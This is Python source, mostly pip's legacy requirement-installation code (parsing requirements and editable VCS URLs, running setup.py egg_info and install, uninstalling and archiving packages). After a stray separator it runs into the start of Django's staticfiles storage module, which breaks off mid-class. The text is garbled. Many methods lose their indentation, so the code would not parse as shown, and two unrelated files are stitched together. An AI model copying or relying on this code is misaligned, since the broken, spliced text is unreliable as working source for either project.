        self.use_user_site = False
        self.target_dir = None
        self.pycompile = pycompile
        # True if pre-releases are acceptable: either requested explicitly, or
        # implied by the requirement pinning a pre-release version (other than
        # via a '!=' exclusion).
        if prereleases:
            self.prereleases = True
        elif self.req is not None:
            self.prereleases = any([
                is_prerelease(x[1]) and x[0] != "!=" for x in self.req.specs
            ])
        else:
            self.prereleases = False
@classmethod
def from_editable(cls, editable_req, comes_from=None, default_vcs=None):
name, url, extras_override = parse_editable(editable_req, default_vcs)
if url.startswith('file:'):
source_dir = url_to_path(url)
else:
source_dir = None
res = cls(name, comes_from, source_dir=source_dir,
editable=True,
url=url,
editable_options=extras_override,
prereleases=True)
if extras_override is not None:
res.extras = extras_override
return res
    @classmethod
    def from_line(cls, name, comes_from=None, prereleases=None):
        """Creates an InstallRequirement from a name, which might be a
        requirement, directory containing 'setup.py', filename, or URL.
        """
        url = None
        name = name.strip()
        req = None
        path = os.path.normpath(os.path.abspath(name))
        link = None

        # Classify the input: URL, local installable directory, or archive.
        if is_url(name):
            link = Link(name)
        elif (os.path.isdir(path)
                and (os.path.sep in name or name.startswith('.'))):
            if not is_installable_dir(path):
                raise InstallationError(
                    "Directory %r is not installable. File 'setup.py' not "
                    "found." % name
                )
            link = Link(path_to_url(name))
        elif is_archive_file(path):
            if not os.path.isfile(path):
                # Warn but continue: the name merely *looks* like a file.
                logger.warn(
                    'Requirement %r looks like a filename, but the file does '
                    'not exist',
                    name
                )
            link = Link(path_to_url(name))

        # it's a local file, dir, or url
        if link:
            url = link.url
            # Handle relative file URLs
            if link.scheme == 'file' and re.search(r'\.\./', url):
                url = path_to_url(os.path.normpath(os.path.abspath(link.path)))
            # wheel file
            if link.ext == wheel_ext:
                wheel = Wheel(link.filename)  # can raise InvalidWheelFilename
                if not wheel.supported():
                    raise UnsupportedWheel(
                        "%s is not a supported wheel on this platform." %
                        wheel.filename
                    )
                # Pin the requirement to the wheel's exact name and version.
                req = "%s==%s" % (wheel.name, wheel.version)
            else:
                # set the req to the egg fragment. when it's not there, this
                # will become an 'unnamed' requirement
                req = link.egg_fragment
        # a requirement specifier
        else:
            req = name

        return cls(req, comes_from, url=url, prereleases=prereleases)
def __str__(self):
if self.req:
s = str(self.req)
if self.url:
s += ' from %s' % self.url
else:
s = self.url
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += ' (from %s)' % comes_from
return s
def from_path(self):
if self.req is None:
return None
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += '->' + comes_from
return s
def build_location(self, build_dir, unpack=True):
if self._temp_build_dir is not None:
return self._temp_build_dir
if self.req is None:
self._temp_build_dir = tempfile.mkdtemp('-build', 'pip-')
self._ideal_build_dir = build_dir
return self._temp_build_dir
if self.editable:
name = self.name.lower()
else:
name = self.name
# FIXME: Is there a better place to create the build_dir? (hg and bzr
# need this)
if not os.path.exists(build_dir):
_make_build_dir(build_dir)
return os.path.join(build_dir, name)
    def correct_build_location(self):
        """If the build location was a temporary directory, this will move it
        to a new more permanent location"""
        # Only relevant for requirements built via the unnamed-requirement
        # branch of build_location(); otherwise nothing to move.
        if self.source_dir is not None:
            return
        assert self.req is not None
        assert self._temp_build_dir
        old_location = self._temp_build_dir
        new_build_dir = self._ideal_build_dir
        del self._ideal_build_dir
        if self.editable:
            name = self.name.lower()
        else:
            name = self.name
        new_location = os.path.join(new_build_dir, name)
        if not os.path.exists(new_build_dir):
            logger.debug('Creating directory %s' % new_build_dir)
            _make_build_dir(new_build_dir)
        if os.path.exists(new_location):
            raise InstallationError(
                'A package already exists in %s; please remove it to continue'
                % display_path(new_location))
        logger.debug(
            'Moving package %s from %s to new location %s' %
            (self, display_path(old_location), display_path(new_location))
        )
        shutil.move(old_location, new_location)
        self._temp_build_dir = new_location
        self.source_dir = new_location
        # The cached egg-info path pointed into the old location; reset it.
        self._egg_info_path = None
@property
def name(self):
if self.req is None:
return None
return native_str(self.req.project_name)
@property
def url_name(self):
if self.req is None:
return None
return urllib.quote(self.req.unsafe_name)
@property
def setup_py(self):
try:
import setuptools # noqa
except ImportError:
# Setuptools is not available
raise InstallationError(
"setuptools must be installed to install from a source "
"distribution"
)
setup_file = 'setup.py'
if self.editable_options and 'subdirectory' in self.editable_options:
setup_py = os.path.join(self.source_dir,
self.editable_options['subdirectory'],
setup_file)
else:
setup_py = os.path.join(self.source_dir, setup_file)
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(setup_py, six.text_type):
setup_py = setup_py.encode(sys.getfilesystemencoding())
return setup_py
    def run_egg_info(self):
        """Generate egg-info metadata by running 'setup.py egg_info' in a
        subprocess, then derive self.req from it if still unnamed."""
        assert self.source_dir
        if self.name:
            logger.notify(
                'Running setup.py (path:%s) egg_info for package %s' %
                (self.setup_py, self.name)
            )
        else:
            logger.notify(
                'Running setup.py (path:%s) egg_info for package from %s' %
                (self.setup_py, self.url)
            )
        logger.indent += 2
        try:
            # if it's distribute>=0.7, it won't contain an importable
            # setuptools, and having an egg-info dir blocks the ability of
            # setup.py to find setuptools plugins, so delete the egg-info dir
            # if no setuptools. it will get recreated by the run of egg_info
            # NOTE: this self.name check only works when installing from a
            # specifier (not archive path/urls)
            # TODO: take this out later
            if (self.name == 'distribute'
                    and not os.path.isdir(
                        os.path.join(self.source_dir, 'setuptools'))):
                rmtree(os.path.join(self.source_dir, 'distribute.egg-info'))
            # Render the _run_setup_py template and run it with 'python -c'.
            script = self._run_setup_py
            script = script.replace('__SETUP_PY__', repr(self.setup_py))
            script = script.replace('__PKG_NAME__', repr(self.name))
            egg_info_cmd = [sys.executable, '-c', script, 'egg_info']
            # We can't put the .egg-info files at the root, because then the
            # source code will be mistaken for an installed egg, causing
            # problems
            if self.editable:
                egg_base_option = []
            else:
                egg_info_dir = os.path.join(self.source_dir, 'pip-egg-info')
                if not os.path.exists(egg_info_dir):
                    os.makedirs(egg_info_dir)
                egg_base_option = ['--egg-base', 'pip-egg-info']
            cwd = self.source_dir
            if self.editable_options and \
                    'subdirectory' in self.editable_options:
                cwd = os.path.join(cwd, self.editable_options['subdirectory'])
            call_subprocess(
                egg_info_cmd + egg_base_option,
                cwd=cwd,
                filter_stdout=self._filter_install,
                show_stdout=False,
                command_level=logger.VERBOSE_DEBUG,
                command_desc='python setup.py egg_info')
        finally:
            logger.indent -= 2
        if not self.req:
            # Unnamed requirement: pin it to the name/version the freshly
            # generated PKG-INFO reports, and move out of the temp build dir.
            self.req = pkg_resources.Requirement.parse(
                "%(Name)s==%(Version)s" % self.pkg_info())
            self.correct_build_location()
# FIXME: This is a lame hack, entirely for PasteScript which has
# a self-provided entry point that causes this awkwardness
_run_setup_py = """
__file__ = __SETUP_PY__
from setuptools.command import egg_info
import pkg_resources
import os
import tokenize
def replacement_run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in pkg_resources.iter_entry_points('egg_info.writers'):
# require=False is the change we're making:
writer = ep.load(require=False)
if writer:
writer(self, ep.name, os.path.join(self.egg_info,ep.name))
self.find_sources()
egg_info.egg_info.run = replacement_run
exec(compile(
getattr(tokenize, 'open', open)(__file__).read().replace('\\r\\n', '\\n'),
__file__,
'exec'
))
"""
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
data = read_text_file(filename)
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.source_dir, 'pip-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = []
for root, dirs, files in os.walk(base):
for dir in vcs.dirnames:
if dir in dirs:
dirs.remove(dir)
# Iterate over a copy of ``dirs``, since mutating
# a list while iterating over it can cause trouble.
# (See https://github.com/pypa/pip/pull/462.)
for dir in list(dirs):
# Don't search in anything that looks like a virtualenv
# environment
if (
os.path.exists(
os.path.join(root, dir, 'bin', 'python')
)
or os.path.exists(
os.path.join(
root, dir, 'Scripts', 'Python.exe'
)
)):
dirs.remove(dir)
# Also don't search through tests
elif dir == 'test' or dir == 'tests':
dirs.remove(dir)
filenames.extend([os.path.join(root, dir)
for dir in dirs])
filenames = [f for f in filenames if f.endswith('.egg-info')]
if not filenames:
raise InstallationError(
'No files/directories in %s (from %s)' % (base, filename)
)
assert filenames, \
"No files/directories in %s (from %s)" % (base, filename)
# if we have more than one match, we pick the toplevel one. This
# can easily be the case if there is a dist folder which contains
# an extracted tarball for testing purposes.
if len(filenames) > 1:
filenames.sort(
key=lambda x: x.count(os.path.sep)
+ (os.path.altsep and x.count(os.path.altsep) or 0)
)
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def egg_info_lines(self, filename):
data = self.egg_info_data(filename)
if not data:
return []
result = []
for line in data.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
result.append(line)
return result
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warn(
'No PKG-INFO file found in %s' %
display_path(self.egg_info_path('PKG-INFO'))
)
p.feed(data or '')
return p.close()
@property
def dependency_links(self):
return self.egg_info_lines('dependency_links.txt')
    # Matches '[extra_name]' section headers in a requires.txt file.
    _requirements_section_re = re.compile(r'\[(.*?)\]')

    def requirements(self, extras=()):
        """Yield this requirement's dependency strings.

        Reads the installed distribution's metadata when satisfied_by is
        set; otherwise parses requires.txt, skipping sections for extras
        not listed in *extras*.
        """
        if self.satisfied_by:
            for r in self.satisfied_by.requires(extras):
                yield str(r)
            return
        in_extra = None
        for line in self.egg_info_lines('requires.txt'):
            match = self._requirements_section_re.match(line.lower())
            if match:
                # Entering a new '[extra]' section.
                in_extra = match.group(1)
                continue
            if in_extra and in_extra not in extras:
                logger.debug('skipping extra %s' % in_extra)
                # Skip requirement for an extra we aren't requiring
                continue
            yield line
@property
def absolute_versions(self):
for qualifier, version in self.req.specs:
if qualifier == '==':
yield version
@property
def installed_version(self):
return self.pkg_info()['version']
    def assert_source_matches_version(self):
        """Warn when the unpacked source's version does not satisfy self.req;
        despite the name, this only logs -- it never raises."""
        assert self.source_dir
        version = self.installed_version
        if version not in self.req:
            logger.warn(
                'Requested %s, but installing version %s' %
                (self, self.installed_version)
            )
        else:
            logger.debug(
                'Source in %s has version %s, which satisfies requirement %s' %
                (display_path(self.source_dir), version, self)
            )
    def update_editable(self, obtain=True):
        """Refresh an editable (VCS) checkout in self.source_dir.

        :param obtain: when True, obtain/update the working copy; when
            False, export it instead.
        """
        if not self.url:
            logger.info(
                "Cannot update repository at %s; repository location is "
                "unknown" % self.source_dir
            )
            return
        assert self.editable
        assert self.source_dir
        if self.url.startswith('file:'):
            # Static paths don't get updated
            return
        # Editable VCS URLs look like 'vcs+url', e.g. 'git+https://...'.
        assert '+' in self.url, "bad url: %r" % self.url
        if not self.update:
            return
        vc_type, url = self.url.split('+', 1)
        backend = vcs.get_backend(vc_type)
        if backend:
            vcs_backend = backend(self.url)
            if obtain:
                vcs_backend.obtain(self.source_dir)
            else:
                vcs_backend.export(self.source_dir)
        else:
            assert 0, (
                'Unexpected version control type (in %s): %s'
                % (self.url, vc_type))
    def uninstall(self, auto_confirm=False):
        """
        Uninstall the distribution currently satisfying this requirement.

        Prompts before removing or modifying files unless
        ``auto_confirm`` is True.

        Refuses to delete or modify files outside of ``sys.prefix`` -
        thus uninstallation within a virtual environment can only
        modify that virtual environment, even if the virtualenv is
        linked to global site-packages.
        """
        if not self.check_if_exists():
            raise UninstallationError(
                "Cannot uninstall requirement %s, not installed" % (self.name,)
            )
        dist = self.satisfied_by or self.conflicts_with

        paths_to_remove = UninstallPathSet(dist)

        # Candidate metadata locations: pip-style .egg-info, PEP 376
        # .dist-info, and Debian's renamed .egg-info (python-version suffix
        # stripped).
        pip_egg_info_path = os.path.join(dist.location,
                                         dist.egg_name()) + '.egg-info'
        dist_info_path = os.path.join(dist.location,
                                      '-'.join(dist.egg_name().split('-')[:2])
                                      ) + '.dist-info'
        # Workaround - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=618367
        debian_egg_info_path = pip_egg_info_path.replace(
            '-py%s' % pkg_resources.PY_MAJOR, '')
        easy_install_egg = dist.egg_name() + '.egg'
        develop_egg_link = egg_link_path(dist)

        pip_egg_info_exists = os.path.exists(pip_egg_info_path)
        debian_egg_info_exists = os.path.exists(debian_egg_info_path)
        dist_info_exists = os.path.exists(dist_info_path)
        if pip_egg_info_exists or debian_egg_info_exists:
            # package installed by pip
            if pip_egg_info_exists:
                egg_info_path = pip_egg_info_path
            else:
                egg_info_path = debian_egg_info_path
            paths_to_remove.add(egg_info_path)
            if dist.has_metadata('installed-files.txt'):
                # installed-files.txt records paths relative to the egg-info
                # directory.
                for installed_file in dist.get_metadata(
                        'installed-files.txt').splitlines():
                    path = os.path.normpath(
                        os.path.join(egg_info_path, installed_file)
                    )
                    paths_to_remove.add(path)
            # FIXME: need a test for this elif block
            # occurs with --single-version-externally-managed/--record outside
            # of pip
            elif dist.has_metadata('top_level.txt'):
                if dist.has_metadata('namespace_packages.txt'):
                    namespaces = dist.get_metadata('namespace_packages.txt')
                else:
                    namespaces = []
                for top_level_pkg in [
                        p for p
                        in dist.get_metadata('top_level.txt').splitlines()
                        if p and p not in namespaces]:
                    path = os.path.join(dist.location, top_level_pkg)
                    paths_to_remove.add(path)
                    paths_to_remove.add(path + '.py')
                    paths_to_remove.add(path + '.pyc')

        elif dist.location.endswith(easy_install_egg):
            # package installed by easy_install
            paths_to_remove.add(dist.location)
            easy_install_pth = os.path.join(os.path.dirname(dist.location),
                                            'easy-install.pth')
            paths_to_remove.add_pth(easy_install_pth, './' + easy_install_egg)

        elif develop_egg_link:
            # develop egg
            fh = open(develop_egg_link, 'r')
            link_pointer = os.path.normcase(fh.readline().strip())
            fh.close()
            assert (link_pointer == dist.location), (
                'Egg-link %s does not match installed location of %s '
                '(at %s)' % (link_pointer, self.name, dist.location)
            )
            paths_to_remove.add(develop_egg_link)
            easy_install_pth = os.path.join(os.path.dirname(develop_egg_link),
                                            'easy-install.pth')
            paths_to_remove.add_pth(easy_install_pth, dist.location)

        elif dist_info_exists:
            # wheel-style install: paths come from RECORD
            for path in pip.wheel.uninstallation_paths(dist):
                paths_to_remove.add(path)

        # find distutils scripts= scripts
        if dist.has_metadata('scripts') and dist.metadata_isdir('scripts'):
            for script in dist.metadata_listdir('scripts'):
                if dist_in_usersite(dist):
                    bin_dir = bin_user
                else:
                    bin_dir = bin_py
                paths_to_remove.add(os.path.join(bin_dir, script))
                if WINDOWS:
                    paths_to_remove.add(os.path.join(bin_dir, script) + '.bat')

        # find console_scripts
        if dist.has_metadata('entry_points.txt'):
            config = configparser.SafeConfigParser()
            config.readfp(
                FakeFile(dist.get_metadata_lines('entry_points.txt'))
            )
            if config.has_section('console_scripts'):
                for name, value in config.items('console_scripts'):
                    if dist_in_usersite(dist):
                        bin_dir = bin_user
                    else:
                        bin_dir = bin_py
                    paths_to_remove.add(os.path.join(bin_dir, name))
                    if WINDOWS:
                        # Script wrappers generated on Windows.
                        paths_to_remove.add(
                            os.path.join(bin_dir, name) + '.exe'
                        )
                        paths_to_remove.add(
                            os.path.join(bin_dir, name) + '.exe.manifest'
                        )
                        paths_to_remove.add(
                            os.path.join(bin_dir, name) + '-script.py'
                        )

        # Actually remove everything (prompting unless auto_confirm); keep
        # the set around so commit/rollback can run later.
        paths_to_remove.remove(auto_confirm)
        self.uninstalled = paths_to_remove
def rollback_uninstall(self):
    """Undo a previous uninstall by restoring the removed paths."""
    uninstalled = self.uninstalled
    if not uninstalled:
        # uninstall() never recorded anything; log instead of raising.
        logger.error("Can't rollback %s, nothing uninstalled."
                     % (self.project_name,))
        return
    uninstalled.rollback()
def commit_uninstall(self):
    """Finalize a previous uninstall, discarding the saved backups."""
    uninstalled = self.uninstalled
    if not uninstalled:
        # uninstall() never recorded anything; log instead of raising.
        logger.error("Can't commit %s, nothing uninstalled."
                     % (self.project_name,))
        return
    uninstalled.commit()
def archive(self, build_dir):
    """Create a zip archive of this requirement's source tree in *build_dir*.

    When the target archive already exists the user is prompted to
    (i)gnore, (w)ipe or (b)ackup it.  Directory entries are written with
    mode 0755 and pip's own 'pip-egg-info' directory is excluded, as is
    the delete-marker file.
    """
    assert self.source_dir
    create_archive = True
    archive_name = '%s-%s.zip' % (self.name, self.installed_version)
    archive_path = os.path.join(build_dir, archive_name)
    if os.path.exists(archive_path):
        # Ask the user how to handle the pre-existing archive.
        response = ask_path_exists(
            'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
            display_path(archive_path), ('i', 'w', 'b'))
        if response == 'i':
            create_archive = False
        elif response == 'w':
            logger.warn('Deleting %s' % display_path(archive_path))
            os.remove(archive_path)
        elif response == 'b':
            dest_file = backup_dir(archive_path)
            logger.warn(
                'Backing up %s to %s' %
                (display_path(archive_path), display_path(dest_file))
            )
            shutil.move(archive_path, dest_file)
    if create_archive:
        zip = zipfile.ZipFile(
            archive_path, 'w', zipfile.ZIP_DEFLATED,
            allowZip64=True
        )
        dir = os.path.normcase(os.path.abspath(self.source_dir))
        for dirpath, dirnames, filenames in os.walk(dir):
            if 'pip-egg-info' in dirnames:
                # Never archive pip's own metadata directory.
                dirnames.remove('pip-egg-info')
            for dirname in dirnames:
                dirname = os.path.join(dirpath, dirname)
                name = self._clean_zip_name(dirname, dir)
                zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
                zipdir.external_attr = 0x1ED << 16  # 0o755
                zip.writestr(zipdir, '')
            for filename in filenames:
                if filename == PIP_DELETE_MARKER_FILENAME:
                    continue
                filename = os.path.join(dirpath, filename)
                name = self._clean_zip_name(filename, dir)
                zip.write(filename, self.name + '/' + name)
        zip.close()
        logger.indent -= 2
        logger.notify('Saved %s' % display_path(archive_path))
def _clean_zip_name(self, name, prefix):
assert name.startswith(prefix + os.path.sep), (
"name %r doesn't start with prefix %r" % (name, prefix)
)
name = name[len(prefix) + 1:]
name = name.replace(os.path.sep, '/')
return name
def install(self, install_options, global_options=(), root=None):
    """Install this requirement.

    Editable requirements are delegated to install_editable(); wheels
    are unpacked directly.  Otherwise ``setup.py install`` is run in a
    subprocess with ``--record`` so the list of installed files can be
    written to the distribution's installed-files.txt.
    """
    if self.editable:
        self.install_editable(install_options, global_options)
        return
    if self.is_wheel:
        version = pip.wheel.wheel_version(self.source_dir)
        pip.wheel.check_compatibility(version, self.name)
        self.move_wheel_files(self.source_dir, root=root)
        self.install_succeeded = True
        return
    # The record file lists every path setup.py installed.
    temp_location = tempfile.mkdtemp('-record', 'pip-')
    record_filename = os.path.join(temp_location, 'install-record.txt')
    try:
        install_args = [sys.executable]
        install_args.append('-c')
        # Run setup.py via compile/exec so that tokenize.open (when
        # available) handles source encodings correctly.
        install_args.append(
            "import setuptools, tokenize;__file__=%r;"
            "exec(compile(getattr(tokenize, 'open', open)(__file__).read()"
            ".replace('\\r\\n', '\\n'), __file__, 'exec'))" % self.setup_py
        )
        install_args += list(global_options) + \
            ['install', '--record', record_filename]
        if not self.as_egg:
            install_args += ['--single-version-externally-managed']
        if root is not None:
            install_args += ['--root', root]
        if self.pycompile:
            install_args += ["--compile"]
        else:
            install_args += ["--no-compile"]
        if running_under_virtualenv():
            # FIXME: I'm not sure if this is a reasonable location;
            # probably not but we can't put it in the default location, as
            # that is a virtualenv symlink that isn't writable
            py_ver_str = 'python' + sysconfig.get_python_version()
            install_args += ['--install-headers',
                             os.path.join(sys.prefix, 'include', 'site',
                                          py_ver_str)]
        logger.notify('Running setup.py install for %s' % self.name)
        logger.indent += 2
        try:
            call_subprocess(
                install_args + install_options,
                cwd=self.source_dir,
                filter_stdout=self._filter_install,
                show_stdout=False,
            )
        finally:
            logger.indent -= 2
        if not os.path.exists(record_filename):
            logger.notify('Record file %s not found' % record_filename)
            return
        self.install_succeeded = True
        if self.as_egg:
            # there's no --always-unzip option we can pass to install
            # command so we unable to save the installed-files.txt
            return

        def prepend_root(path):
            # Rebase absolute recorded paths under --root, when given.
            if root is None or not os.path.isabs(path):
                return path
            else:
                return change_root(root, path)

        # First pass: locate the installed .egg-info directory.
        f = open(record_filename)
        for line in f:
            line = line.strip()
            if line.endswith('.egg-info'):
                egg_info_dir = prepend_root(line)
                break
        else:
            logger.warn(
                'Could not find .egg-info directory in install record for '
                '%s' % self
            )
            f.close()
            # FIXME: put the record somewhere
            # FIXME: should this be an error?
            return
        f.close()
        # Second pass: rewrite each recorded path relative to egg-info.
        new_lines = []
        f = open(record_filename)
        for line in f:
            filename = line.strip()
            if os.path.isdir(filename):
                filename += os.path.sep
            new_lines.append(
                make_path_relative(prepend_root(filename), egg_info_dir)
            )
        f.close()
        f = open(os.path.join(egg_info_dir, 'installed-files.txt'), 'w')
        f.write('\n'.join(new_lines) + '\n')
        f.close()
    finally:
        # Always clean up the temporary record location.
        if os.path.exists(record_filename):
            os.remove(record_filename)
        os.rmdir(temp_location)
def remove_temporary_source(self):
    """Delete this requirement's source tree (only when the delete
    marker file is present) and its temporary build directory."""
    if os.path.exists(self.delete_marker_filename):
        logger.info('Removing source in %s' % self.source_dir)
        if self.source_dir:
            rmtree(self.source_dir)
        self.source_dir = None
    temp_dir = self._temp_build_dir
    if temp_dir and os.path.exists(temp_dir):
        rmtree(temp_dir)
        self._temp_build_dir = None
def install_editable(self, install_options, global_options=()):
    """Install this requirement in editable mode.

    Runs ``setup.py develop --no-deps`` in a subprocess, using the
    source directory (or its configured ``subdirectory``) as cwd.
    """
    logger.notify('Running setup.py develop for %s' % self.name)
    logger.indent += 2
    try:
        # FIXME: should we do --install-headers here too?
        cwd = self.source_dir
        if self.editable_options and \
                'subdirectory' in self.editable_options:
            cwd = os.path.join(cwd, self.editable_options['subdirectory'])
        call_subprocess(
            [
                sys.executable,
                '-c',
                # compile/exec + tokenize.open handles source encodings.
                "import setuptools, tokenize; __file__=%r; exec(compile("
                "getattr(tokenize, 'open', open)(__file__).read().replace"
                "('\\r\\n', '\\n'), __file__, 'exec'))" % self.setup_py
            ]
            + list(global_options)
            + ['develop', '--no-deps']
            + list(install_options),
            cwd=cwd, filter_stdout=self._filter_install,
            show_stdout=False)
    finally:
        logger.indent -= 2
    self.install_succeeded = True
def _filter_install(self, line):
    """Classify one line of setup.py output for logging.

    Routine progress messages are demoted to INFO level; everything
    else stays at NOTIFY.  Returns a ``(level, line)`` tuple.
    """
    noise_patterns = (
        r'^running .*',
        r'^writing .*',
        '^creating .*',
        '^[Cc]opying .*',
        r'^reading .*',
        r"^removing .*\.egg-info' \(and everything under it\)$",
        r'^byte-compiling ',
        r'^SyntaxError:',
        r'^SyntaxWarning:',
        # Not sure what this warning is, but it seems harmless:
        r"^warning: manifest_maker: standard file '-c' not found$",
    )
    stripped = line.strip()
    if any(re.search(pattern, stripped) for pattern in noise_patterns):
        return (logger.INFO, line)
    return (logger.NOTIFY, line)
def check_if_exists(self):
    """Find an installed distribution that satisfies or conflicts
    with this requirement, and set self.satisfied_by or
    self.conflicts_with appropriately.

    Returns True when some distribution (satisfying or conflicting)
    is installed, False otherwise.  May raise InstallationError when
    installing to the user site would be shadowed by a system install.
    """
    if self.req is None:
        return False
    try:
        # DISTRIBUTE TO SETUPTOOLS UPGRADE HACK (1 of 3 parts)
        # if we've already set distribute as a conflict to setuptools
        # then this check has already run before. we don't want it to
        # run again, and return False, since it would block the uninstall
        # TODO: remove this later
        if (self.req.project_name == 'setuptools'
                and self.conflicts_with
                and self.conflicts_with.project_name == 'distribute'):
            return True
        else:
            self.satisfied_by = pkg_resources.get_distribution(self.req)
    except pkg_resources.DistributionNotFound:
        return False
    except pkg_resources.VersionConflict:
        # An incompatible version is installed; record it so callers
        # can decide to uninstall/replace it.
        existing_dist = pkg_resources.get_distribution(
            self.req.project_name
        )
        if self.use_user_site:
            if dist_in_usersite(existing_dist):
                self.conflicts_with = existing_dist
            elif (running_under_virtualenv()
                    and dist_in_site_packages(existing_dist)):
                # A user-site install would lose to this system copy.
                raise InstallationError(
                    "Will not install to the user site because it will "
                    "lack sys.path precedence to %s in %s" %
                    (existing_dist.project_name, existing_dist.location)
                )
        else:
            self.conflicts_with = existing_dist
    return True
@property
def is_wheel(self):
    """Truthy when this requirement's URL points at a wheel file."""
    url = self.url
    return url and '.whl' in url
def move_wheel_files(self, wheeldir, root=None):
    """Unpack the wheel at *wheeldir* into its final install locations."""
    # Delegates to the module-level move_wheel_files helper.
    kwargs = {
        'user': self.use_user_site,
        'home': self.target_dir,
        'root': root,
        'pycompile': self.pycompile,
    }
    move_wheel_files(self.name, self.req, wheeldir, **kwargs)
@property
def delete_marker_filename(self):
    """Path of the marker file flagging this source tree for deletion."""
    source_dir = self.source_dir
    assert source_dir
    return os.path.join(source_dir, PIP_DELETE_MARKER_FILENAME)
def _strip_postfix(req):
"""
Strip req postfix ( -dev, 0.2, etc )
"""
# FIXME: use package_to_requirement?
match = re.search(r'^(.*?)(?:-dev|-\d.*)$', req)
if match:
# Strip off -dev, -0.2, etc.
req = match.group(1)
return req
def _build_req_from_url(url):
parts = [p for p in url.split('#', 1)[0].split('/') if p]
req = None
if parts[-2] in ('tags', 'branches', 'tag', 'branch'):
req = parts[-3]
elif parts[-1] == 'trunk':
req = parts[-2]
return req
def _build_editable_options(req):
"""
This method generates a dictionary of the query string
parameters contained in a given editable URL.
"""
regexp = re.compile(r"[\?#&](?P<name>[^&=]+)=(?P<value>[^&=]+)")
matched = regexp.findall(req)
if matched:
ret = dict()
for option in matched:
(name, value) = option
if name in ret:
raise Exception("%s option already defined" % name)
ret[name] = value
return ret
return None
def parse_editable(editable_req, default_vcs=None):
    """Parses svn+http://blahblah@rev#egg=Foobar into a requirement
    (Foobar) and a URL.

    Returns a ``(package_name, url, options)`` tuple.  Local directories
    containing a setup.py are turned into file: URLs (package_name may be
    None in that case).  Raises InstallationError for non-installable
    directories, unknown VCS schemes, malformed options, or when no
    package name can be determined.
    """
    url = editable_req
    extras = None
    # If a file path is specified with extras, strip off the extras.
    m = re.match(r'^(.+)(\[[^\]]+\])$', url)
    if m:
        url_no_extras = m.group(1)
        extras = m.group(2)
    else:
        url_no_extras = url
    if os.path.isdir(url_no_extras):
        if not os.path.exists(os.path.join(url_no_extras, 'setup.py')):
            raise InstallationError(
                "Directory %r is not installable. File 'setup.py' not found." %
                url_no_extras
            )
        # Treating it as code that has already been checked out
        url_no_extras = path_to_url(url_no_extras)
    if url_no_extras.lower().startswith('file:'):
        if extras:
            # Parse the extras via a placeholder requirement string.
            return (
                None,
                url_no_extras,
                pkg_resources.Requirement.parse(
                    '__placeholder__' + extras
                ).extras,
            )
        else:
            return None, url_no_extras, None
    # Prefix bare VCS scheme URLs (e.g. 'svn:...') with the VCS name.
    for version_control in vcs:
        if url.lower().startswith('%s:' % version_control):
            url = '%s+%s' % (version_control, url)
            break
    if '+' not in url:
        if default_vcs:
            url = default_vcs + '+' + url
        else:
            raise InstallationError(
                '%s should either be a path to a local project or a VCS url '
                'beginning with svn+, git+, hg+, or bzr+' %
                editable_req
            )
    vc_type = url.split('+', 1)[0].lower()
    if not vcs.get_backend(vc_type):
        error_message = 'For --editable=%s only ' % editable_req + \
            ', '.join([backend.name + '+URL' for backend in vcs.backends]) + \
            ' is currently supported'
        raise InstallationError(error_message)
    try:
        options = _build_editable_options(editable_req)
    except Exception as exc:
        raise InstallationError(
            '--editable=%s error in editable options:%s' % (editable_req, exc)
        )
    # Fall back to guessing the name from the URL layout when no #egg=.
    if not options or 'egg' not in options:
        req = _build_req_from_url(editable_req)
        if not req:
            raise InstallationError(
                '--editable=%s is not the right format; it must have '
                '#egg=Package' % editable_req
            )
    else:
        req = options['egg']
    package = _strip_postfix(req)
    return package, url, options
| |
from __future__ import with_statement
import hashlib
import os
import posixpath
import re
from urllib import unquote
from urlparse import urlsplit, urlunsplit
from django.conf import settings
from django.core.cache import (get_cache, InvalidCacheBackendError,
cache as default_cache)
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.utils.encoding import force_unicode
from django.utils.functional import LazyObject
from django.utils.importlib import import_module
from django.utils.datastructures import SortedDict
from django.contrib.staticfiles.utils import check_settings, matches_patterns
class StaticFilesStorage(FileSystemStorage):
    """
    Standard file system storage for static files.
    The defaults for ``location`` and ``base_url`` are
    ``STATIC_ROOT`` and ``STATIC_URL``.
    """
    def __init__(self, location=None, base_url=None, *args, **kwargs):
        # Fall back to the project-wide settings when not given explicitly.
        if location is None:
            location = settings.STATIC_ROOT
        if base_url is None:
            base_url = settings.STATIC_URL
        check_settings(base_url)
        super(StaticFilesStorage, self).__init__(location, base_url,
                                                 *args, **kwargs)
    def path(self, name):
        # STATIC_ROOT must be configured to resolve filesystem paths.
        if not self.location:
            raise ImproperlyConfigured("You're using the staticfiles app "
                                       "without having set the STATIC_ROOT "
                                       "setting to a filesystem path.")
        return super(StaticFilesStorage, self).path(name)
class CachedFilesMixin(object):
    """
    Storage mixin that saves content-hashed copies of files and rewrites
    URL references inside CSS files to point at the hashed names, caching
    the original-name -> hashed-name mapping.
    """
    # (file glob, regexes) pairs; each regex captures the full match in
    # group 1 and the referenced URL in group 2.
    patterns = (
        ("*.css", (
            r"""(url\(['"]{0,1}\s*(.*?)["']{0,1}\))""",
            r"""(@import\s*["']\s*(.*?)["'])""",
        )),
    )
    def __init__(self, *args, **kwargs):
